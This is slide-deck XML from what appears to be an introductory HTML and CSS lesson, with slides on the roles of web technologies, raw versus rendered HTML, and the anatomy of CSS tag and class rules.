        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="18421" t="15789" r="18421" b="15789"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4794742" y="911223"/>
            <a:ext cx="1828800" cy="1981200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA365FE2-379A-410A-8C09-6E4DC51942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3240" y="1030750"/>
            <a:ext cx="2199644" cy="1742147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F48DA026-A68A-4827-9B21-B8DDC643514E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3048000"/>
            <a:ext cx="2209800" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F22B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ller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>STRUCTURE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CONTENT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D78A1F9-2AF9-47F9-8C7B-860D5DF0F682}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2264923" y="3048000"/>
            <a:ext cx="2328152" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F7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r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LOOKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LAYOUT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C00A79B4-B1F4-40BD-B208-0EA2D66C4585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648199" y="3048000"/>
            <a:ext cx="2307077" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83C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ller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>INTERACTION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BEHAVIOR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD331BEE-638F-42F2-829D-A9CFCDC72096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="3048000"/>
            <a:ext cx="2209800" cy="3352800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="45B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endParaRPr lang="en-US" sz="600" b="1" dirty="0">
              <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RICH MEDIA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Aller Display" panose="04030805020B02020A02" pitchFamily="82" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RESOURCES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1599482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24033F8-1EDB-46D6-B70C-18FDC3C4C94B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5029200" y="381000"/>
            <a:ext cx="3946914" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RENDERED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99E45A7A-4D1A-4752-984A-5FC78DD3C6AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="381000"/>
            <a:ext cx="3916457" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>RAW HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D23F197F-1261-4854-A99A-14583A815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295401"/>
            <a:ext cx="3919863" cy="4449670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DC93907-0F76-46A8-BF2F-118A02A0ABCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="13792" b="2164"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="3916457" cy="4449670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Straight Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A16741CC-5E20-41B7-9F48-7E21DD22A519}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1324583"/>
            <a:ext cx="0" cy="44204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47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2F70262-B259-4E8A-8CBA-FF165E9C138C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="933450" y="683603"/>
            <a:ext cx="7296150" cy="5490794"/>
            <a:chOff x="933450" y="801469"/>
            <a:chExt cx="7296150" cy="5490794"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2" name="Picture 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC00577B-4D72-4EF0-ABF6-C95323CB0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455571"/>
              <a:ext cx="2974652" cy="4836692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A9ED2F7-11A5-421A-8A71-4DC6E900B117}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect r="11382"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5254947" y="1466938"/>
              <a:ext cx="2974653" cy="4825325"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91DC264E-34B0-42EF-874D-E99375993D0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1143000" y="801620"/>
              <a:ext cx="2765102" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CSS Magic</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="TextBox 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C05B22B1-9BC9-43C4-90DF-7FDB3BD88C83}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5333999" y="801469"/>
              <a:ext cx="2895601" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CSS Muggle</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3422656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CD1A8C8-FC4E-4E4C-AF93-9D728DC466E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-152400" y="653854"/>
            <a:ext cx="9372600" cy="574694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1631F-74FC-4EDC-ADCB-D23701ACC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anatomy of a Tag Rule</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234EF9C9-681A-44FA-9FA8-1D2AD9ABFDDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1323874" y="2001558"/>
            <a:ext cx="6496253" cy="2845953"/>
            <a:chOff x="938069" y="1860320"/>
            <a:chExt cx="6496253" cy="2845953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE26D241-BAF0-4E37-BC14-9A5A61495FEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2257905" y="2397949"/>
              <a:ext cx="5176417" cy="2308324"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>h3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>{</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  font-size: 24px;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  color: tomato;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2"/>
                  </a:solidFill>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ED9C7D60-9F1B-4E41-9AD9-9EA92F4236CD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1996213" y="1860320"/>
              <a:ext cx="1398653" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>TAG NAME</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Right Brace 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43488C70-1497-40A6-85F7-00A72AEB5C33}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2581240" y="1906318"/>
              <a:ext cx="228601" cy="875270"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="63A8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CBC50C-F5B6-48BD-AE8C-B39EC7FE6760}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1905000" y="2971800"/>
              <a:ext cx="381000" cy="1219200"/>
            </a:xfrm>
            <a:prstGeom prst="leftBrace">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="F75B4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E7B9779-F1FD-49B2-9614-69A0DB7F1037}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="938069" y="3258234"/>
              <a:ext cx="966931" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CSS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>RULES</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23061348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1C9AAA-DA1C-4024-94DA-84A509ECF032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-152400" y="653854"/>
            <a:ext cx="9372600" cy="574694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1631F-74FC-4EDC-ADCB-D23701ACC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anatomy of a Class Rule</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{234EF9C9-681A-44FA-9FA8-1D2AD9ABFDDE}"/>
              </a:ext>
            </a:extLst>
